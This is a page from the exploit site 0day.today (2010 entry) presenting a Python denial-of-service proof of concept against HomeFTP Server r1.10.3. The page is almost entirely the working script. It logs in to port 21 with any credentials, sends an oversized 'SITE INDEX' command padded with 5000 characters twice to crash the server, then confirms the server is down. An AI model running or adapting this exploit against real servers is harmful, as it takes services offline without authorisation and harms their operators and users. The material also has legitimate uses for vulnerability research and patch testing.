[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit

Author
Dr_IDE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12434
Category
dos / poc
Date add
28-05-2010
Platform
windows
============================================================
HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit
============================================================

#!/usr/bin/python
###################################################################
#
# HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit
# Found By: Dr_IDE
# Date:     May 28, 2010
# Download: http://downstairs.dnsalias.net/products.html
# Tested:   Windows 7
#
###################################################################
  
import socket, sys
  
host = (sys.argv[1])
buff = ("A" * 5000)
cmds = ('SITE INDEX')
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[i] Connecting to: " + host +"\r\n")
print ("[*] Crashing server with command: " + cmds + "\r\n")
 
try:
    s.connect((host, 21))
    d=s.recv(1024)
    print (d)
    s.send("USER dr_ide\r\n") #anonymous login so anything goes
    d=s.recv(1024)
    print (d)
    s.send("PASS dr_ide\r\n")
    d=s.recv(1024)
    print (d)
    s.send(cmds + " " + buff + '\r\n')
    d=s.recv(1024)
    print (d)
    s.send(cmds + " " + buff + '\r\n') #Second time does the trick.
    d=s.recv(1024)
    print (d)
    s.close()
     
    try:
        s.connect((host,21))
    except:
        print ("\r\n[i] Success, Server is Down.")
except:
    print ("[i] Error")



#  0day.today [2024-11-16]  #